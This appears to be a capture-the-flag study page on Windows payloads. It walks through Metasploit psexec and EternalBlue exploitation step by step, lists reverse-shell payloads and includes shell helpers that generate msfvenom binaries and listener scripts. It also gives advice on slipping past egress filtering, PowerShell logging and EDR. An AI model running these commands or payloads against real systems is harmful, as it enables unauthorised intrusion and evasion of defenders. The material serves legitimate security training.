> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/windows-payloads.md).

# Windows Payloads

Using Metasploit's `psexec` module with known credentials. The account must be a local administrator on the target, because the module writes a service payload into the administrative share and starts it through the Service Control Manager:

```bash
msfconsole
search smb psexec                                 # Find the module
use exploit/windows/smb/psexec                    # Select it
options                                           # View required settings
set RHOSTS <Victim_IP>                            # Target IP
set SHARE ADMIN$                                  # Target share (default; requires local-admin creds)
set SMBUser <username>
set SMBPass <password>
set SMBDomain .                                   # "." for a local account, otherwise the AD domain
set payload windows/x64/meterpreter/reverse_tcp   # Pick the payload explicitly; it must match the handler
set LHOST <Your_IP>                               # Your listener IP
set LPORT 4444                                    # Your listener port
exploit                                           # Fire
```

***

#### Windows Payloads

Staged (Notice the `/` separating the stages)

* `windows/x64/meterpreter/reverse_tcp`
* `windows/x64/meterpreter/reverse_http`
* `windows/x64/meterpreter/reverse_https`
* `windows/x64/shell/reverse_tcp`
* `windows/x64/encrypted_shell/reverse_tcp`

Stageless (Notice the `_` combining the shell and network communication)

* `windows/x64/encrypted_shell_reverse_tcp`
* `windows/x64/powershell_reverse_tcp`
* `windows/x64/powershell_reverse_tcp_ssl`
* `windows/x64/meterpreter_reverse_http`
* `windows/x64/meterpreter_reverse_https`
* `windows/x64/meterpreter_reverse_tcp`

> Note: If egress filtering blocks arbitrary outbound TCP ports, try `reverse_https` on 443 (TLS-wrapped and able to traverse an HTTP proxy) or `reverse_dns`.
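The staged/stageless distinction matters most at the listener: the `PAYLOAD` set on `multi/handler` must be the exact name passed to `msfvenom`, otherwise a staged handler waits to push a stage that a stageless binary never requests and no session appears. The POSIX shell helpers below are an added example (not from the original page or the Metasploit project): they classify a payload name by its final path component, pick a listener port that blends with the transport, and print the matching `msfvenom` command and handler resource script. The addresses, ports and file names are placeholders.

```sh
#!/bin/sh
# Added example, not from the original page. Addresses/ports/file names are placeholders.

# Staged names end in a bare transport (".../meterpreter/reverse_tcp") because the
# stage is a separate component; stageless names fuse stage and transport into the
# last component (".../meterpreter_reverse_tcp"). So only the last component matters.
payload_kind() {
  case "${1##*/}" in
    reverse_*|bind_*) echo staged ;;
    *)                echo stageless ;;
  esac
}

# Pick a port that blends with the transport: HTTPS/SSL on 443, HTTP on 80,
# anything else on Metasploit's conventional 4444. Order matters: https before http.
default_port() {
  case "${1##*/}" in
    *reverse_https*|*reverse_winhttps*|*_ssl) echo 443 ;;
    *reverse_http*|*reverse_winhttp*)         echo 80 ;;
    *)                                        echo 4444 ;;
  esac
}

# msfvenom invocation for a Windows PE. Stageless output is larger but needs no
# second-stage download; staged output is tiny but the handler must serve the stage.
msfvenom_cmd() {
  echo "msfvenom -p $1 LHOST=$2 LPORT=$3 -f exe -o $4"
}

# multi/handler resource script. PAYLOAD must be byte-for-byte the name given to
# msfvenom; ExitOnSession false plus -j -z keeps one background listener up for
# several callbacks without auto-interacting with each new session.
handler_rc() {
  printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j -z\n' "$1" "$2" "$3"
}

# Demonstration with placeholder values
p=windows/x64/meterpreter_reverse_https
port=$(default_port "$p")
echo "$p is $(payload_kind "$p"), listener port $port"
msfvenom_cmd "$p" 10.10.14.5 "$port" shell.exe
handler_rc   "$p" 10.10.14.5 "$port"
```

Save the printed resource script and start the listener with `msfconsole -q -r handler.rc` before the generated binary runs on the target; a staged payload (`/`) will pull its stage from that listener, a stageless one (`_`) connects straight into a session.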

#### What is Meterpreter?

Meterpreter is Metasploit's **advanced payload**: an in-memory agent with its own command set and loadable extensions (`stdapi`, `priv`, `kiwi`, `incognito`), far more capable than a basic reverse shell.

**How it works:** The Meterpreter stage is a DLL that is reflectively loaded into the memory of the exploited (or migrated-to) process rather than written to disk, so file-based antivirus scanning never sees it. That does not make it invisible: the unmodified Meterpreter is heavily signatured, and memory scanners and behavioural EDR catch it routinely, which is why `migrate`, encoders and custom loaders exist.

**What you can do with it:**

| Command               | What it does                       |
| --------------------- | ---------------------------------- |
| `sysinfo`             | Get system info                    |
| `getuid`              | See who you're running as          |
| `upload` / `download` | Transfer files                     |
| `keyscan_start`       | Start keylogger                    |
| `ps`                  | List processes                     |
| `shell`               | Drop into actual Windows cmd shell |
| `?`                   | See all available commands         |

***

#### Dropping into a Full Windows Shell

Meterpreter's own commands do not cover everything. To get full Windows command access, `shell` spawns a `cmd.exe` channel on the target and attaches you to it (type `exit` to return to the Meterpreter prompt, or `background` the whole session):

```bash
meterpreter > shell
```

```
Microsoft Windows [Version 10.0.18362.1256]
C:\WINDOWS\system32>
```

#### 1. Common Windows Vulnerabilities

Windows' attack surface is driven by Active Directory, cloud interconnectivity, and legacy protocols (SMBv1, NetBIOS, NTLM). You need to be able to identify these common CVEs on sight.

| Vulnerability              | CVE / ID                 | Attack Vector & Impact                                                                                                                                                                                                                                                                               |
| -------------------------- | ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| MS08-067                   | MS08-067 / CVE-2008-4250 | Unauthenticated stack overflow in the Server service's path canonicalization, reached over SMB/RPC. Weaponized by Conficker and Stuxnet.                                                                                                                                                          |
| EternalBlue                | MS17-010 / CVE-2017-0144 | SMBv1 remote code execution as SYSTEM. Leaked by the Shadow Brokers; used by WannaCry and NotPetya. Still common on unpatched hosts.                                                                                                                                                               |
| PrintNightmare             | CVE-2021-34527           | Print Spooler RCE/LPE. An authenticated low-privilege user can call `RpcAddPrinterDriverEx` to install a malicious printer driver DLL that runs as SYSTEM, locally or against a remote spooler.                                                                                                      |
| BlueKeep                   | CVE-2019-0708            | Pre-authentication use-after-free in RDP's handling of the `MS_T120` virtual channel; wormable RCE. Affects Windows 2000 through Windows 7 / Server 2008 R2; Windows 8 and later are not affected.                                                                                                  |
| SIGRed                     | CVE-2020-1350            | Integer overflow in the Windows DNS Server when parsing SIG resource records; wormable. The service runs as SYSTEM, so exploitation on a Domain Controller is Domain Admin-equivalent.                                                                                                              |
| SeriousSAM (HiveNightmare) | CVE-2021-36934           | Over-permissive ACLs on the registry hives under `C:\Windows\System32\config` (SAM, SYSTEM, SECURITY). Any local user can read copies of them from Volume Shadow Copies and dump password hashes.                                                                                                   |
| Zerologon                  | CVE-2020-1472            | Cryptographic flaw in MS-NRPC (Netlogon): AES-CFB8 with an all-zero IV. An all-zero client challenge produces an all-zero credential about once in 256 attempts, authenticating as the DC's machine account without its password; the attacker can then reset that password and take over the domain. |

#### 2. Host Enumeration & Fingerprinting

Before firing an exploit, confirm the OS and the services actually listening.

* Ping (ICMP TTL): Windows starts its TTL at 128, Linux/Unix at 64, many network devices at 255. Each router hop decrements it by one, so a reply with TTL 125 most likely came from a Windows host three hops away. Treat this as a hint only: the default can be changed in the registry and firewalls can rewrite it.
* Nmap OS Detection: `nmap -O -v <IP>` matches the TCP/IP stack against Nmap's fingerprint database (output such as `OS CPE: cpe:/o:microsoft:windows_10`). It is most reliable when Nmap finds at least one open and one closed TCP port.
  * *Fallback:* If host discovery is blocked (no ICMP reply), run `nmap -A -Pn <IP>` to skip the ping probe and still run OS detection, version detection, and default scripts.
* Banner Grabbing: `nmap -sV -v <IP> --script banner` pulls service headers from open ports. This is what identifies specific software versions (an IIS build, a VMware authentication daemon, an SMB dialect) that map to a particular CVE.
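The TTL rule of thumb above generalises to a small classifier: bucket the observed TTL against the three common defaults and back out the hop count. The POSIX shell below is an added example (not from the original page): it parses the `ttl=`/`TTL=` field out of a single ping reply line (both Linux iputils and Windows `ping` formats) and returns an OS guess. The sample reply lines are constructed, not captured from a real host.

```sh
#!/bin/sh
# Added example, not from the original page. Sample ping lines are constructed.

# Map an observed TTL to the nearest default starting value and the implied hop
# count. Defaults: Linux/Unix 64, Windows 128, network appliances/Solaris 255.
# Anything at or below 64 is bucketed as 64, 65..128 as 128, above that as 255.
ttl_guess() {
  t=$1
  if   [ "$t" -le 64 ];  then echo "Linux/Unix (initial TTL 64, $((64 - t)) hops)"
  elif [ "$t" -le 128 ]; then echo "Windows (initial TTL 128, $((128 - t)) hops)"
  else                        echo "Network device/Solaris (initial TTL 255, $((255 - t)) hops)"
  fi
}

# Extract the TTL from one ping reply line. Linux/macOS print 'ttl=', Windows
# prints 'TTL=', so fold case first; prints nothing if no ttl field is present.
ttl_from_ping_line() {
  printf '%s\n' "$1" | tr '[:upper:]' '[:lower:]' \
    | sed -n 's/.*ttl=\([0-9][0-9]*\).*/\1/p'
}

# One reply line in, OS guess out; non-zero exit if the line has no TTL.
os_from_ping_line() {
  ttl=$(ttl_from_ping_line "$1")
  [ -n "$ttl" ] || { echo "no ttl field found"; return 1; }
  ttl_guess "$ttl"
}

# Constructed sample replies (not real captures)
os_from_ping_line '64 bytes from 10.10.10.40: icmp_seq=1 ttl=125 time=41.2 ms'   # -> Windows (initial TTL 128, 3 hops)
os_from_ping_line 'Reply from 10.10.10.50: bytes=32 time=3ms TTL=62'             # -> Linux/Unix (initial TTL 64, 2 hops)
```

Pipe a live reply through it with `ping -c 1 <IP> | sed -n 2p | xargs -0 sh -c 'os_from_ping_line "$0"'` after sourcing the file, then confirm the guess with `nmap -O`; the bucketing is only as good as the assumption that nothing on the path rewrote the TTL.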

#### 3. Payload Types & Delivery

Your delivery mechanism dictates your payload type. Know the differences when staging an attack.

* DLL (Dynamic Link Library): Shared code loaded into another process. *Use case:* DLL hijacking or side-loading, where a privileged process loads your DLL from a writable search path, to run as SYSTEM or bypass UAC.
* Batch (.bat): Plain-text `cmd.exe` scripts. *Use case:* Simple, automated command-line execution (opening a port, sending basic enumeration output back).
* VBS (VBScript): Legacy scripting run by `wscript.exe`/`cscript.exe`. *Use case:* Phishing attachments, malicious Office macros, client-side execution.
* MSI (.msi): Windows Installer packages run by `msiexec`. *Use case:* A malicious installer that returns an elevated reverse shell. This only elevates when the `AlwaysInstallElevated` policy is set to 1 under both `HKLM` and `HKCU` (`SOFTWARE\Policies\Microsoft\Windows\Installer`); check both keys before relying on it.
* PowerShell (.ps1): .NET-based shell and scripting environment. *Use case:* Advanced post-exploitation, loading implants in memory, working with .NET objects directly.

Key Transfer Tools:

* Impacket: Python toolset for direct protocol interaction (`psexec.py`, `smbclient.py`, `wmiexec.py`).
* SMB File Shares: Use the administrative shares `C$` and `ADMIN$` (local-admin credentials required) to host and transfer payloads and to exfiltrate data.

#### 4. The Exploit Chain Walkthrough (EternalBlue / MS17-010)

This is the standard methodology for attacking a vulnerable Windows server using the Metasploit Framework:

1. Enumerate: `nmap -v -A -p 139,445 <IP>` reveals the OS version and whether the SMB ports (445/139) are open.
2. Validate Vulnerability: Use the MSF auxiliary scanner (`auxiliary/scanner/smb/smb_ms17_010`) to confirm the target is susceptible; its output also names the OS build and architecture, which decides whether you need an `x64` payload.
3. Configure Exploit: Select the exploit (e.g., `exploit/windows/smb/ms17_010_psexec`, or `ms17_010_eternalblue` for the direct kernel-pool exploit) and set `RHOSTS`.
4. Set Payload: `set PAYLOAD windows/meterpreter/reverse_tcp` (or the `windows/x64/...` variant for a 64-bit target), then `LHOST` and `LPORT` for your listener.
5. Execute: `check` if you want one more confirmation, then `exploit` to capture a `SYSTEM`-level Meterpreter session.
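The five steps above are easier to repeat across a lab network as a Metasploit resource script. The POSIX shell function below is an added example (not from the original page or the Metasploit project): it writes an `.rc` that runs the MS17-010 scanner first and only then loads the exploit with the payload you name. Target, listener address and port are placeholders; the payload defaults to the page's `windows/meterpreter/reverse_tcp`.

```sh
#!/bin/sh
# Added example, not from the original page. Addresses and ports are placeholders.

# Emit an msfconsole resource script for the MS17-010 chain:
#   $1 = RHOSTS, $2 = LHOST, $3 = LPORT, $4 = payload (optional)
# Lines beginning with '#' are comments as far as msfconsole is concerned.
ms17_chain_rc() {
  rhost=$1; lhost=$2; lport=$3
  payload=${4:-windows/meterpreter/reverse_tcp}
  cat <<EOF
# Step 2: validate. The scanner prints "Host is likely VULNERABLE to MS17-010!"
# together with the OS string; switch to a windows/x64/... payload if it says x64.
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $rhost
run
# Steps 3-4: exploit with an explicitly chosen payload and listener
use exploit/windows/smb/ms17_010_psexec
set RHOSTS $rhost
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
# Step 5: -j backgrounds the job, -z stops msfconsole auto-interacting with the session
exploit -j -z
EOF
}

# Demonstration with placeholder values; redirect to a file for real use
ms17_chain_rc 10.10.10.40 10.10.14.5 4444
```

Write it out with `ms17_chain_rc 10.10.10.40 10.10.14.5 4444 > ms17.rc` and run `msfconsole -q -r ms17.rc`; `sessions -l` then lists the SYSTEM session if the exploit landed. Keeping the scanner in the script means a patched host is reported as not vulnerable before the exploit (which can crash an unpatched-but-unstable target) is ever attempted.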

#### 5. Post-Exploitation Shells: CMD vs. PowerShell

Which shell you spawn during an exam or engagement dictates both your OPSEC and your capability.

Use CMD (`C:\Windows\system32>`) when:

* You are on legacy targets (Windows XP/Vista) where PowerShell is not installed by default.
* You want a smaller footprint: `cmd.exe` keeps no on-disk command history, whereas PowerShell 5.1+ writes interactive history to `%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` and can be configured to log every script block to the `Microsoft-Windows-PowerShell/Operational` event log (event ID 4104).
* You only need native tools, `net` commands, or simple batch files.
* Execution Policy (a speed bump, bypassed with `-ExecutionPolicy Bypass`), AMSI, or Constrained Language Mode is getting in the way of PowerShell scripts.

Use PowerShell (`PS C:\Windows\system32>`) when:

* You need to run custom scripts, modules, or cmdlets.
* You are interacting with cloud environments or Active Directory (the AD module, or LDAP queries through .NET).
* You need to manipulate .NET objects rather than parse flat text.
* Capability matters more than stealth. Note that `cmd.exe` is logged too wherever process-creation auditing is on (event ID 4688 with command-line logging, or Sysmon event ID 1), so "stealthy" is relative.

#### 6. Emerging Vectors: WSL & PowerShell Core

* WSL (Windows Subsystem for Linux): Attackers run Linux binaries and Python 3 inside WSL so that Windows-focused AV/EDR, which hooks Win32 processes, sees little of what executes. On WSL 2 the Linux side is a lightweight VM with its own virtual NIC, so its traffic has historically not been subject to the host's Windows Firewall rules; newer Windows 11 builds add a Hyper-V firewall that covers WSL, so treat the "blind spot" as version-dependent rather than guaranteed.
* PowerShell Core (PowerShell 7, `pwsh`): Cross-platform and installed as a separate binary with its own policy registry keys, so an environment that configured script-block logging only for Windows PowerShell 5.1 may not log `pwsh`. On Linux it carries the same cmdlets over to post-exploitation on non-Windows hosts. On Windows it still submits scripts to AMSI, so it is not invisible, only less monitored.

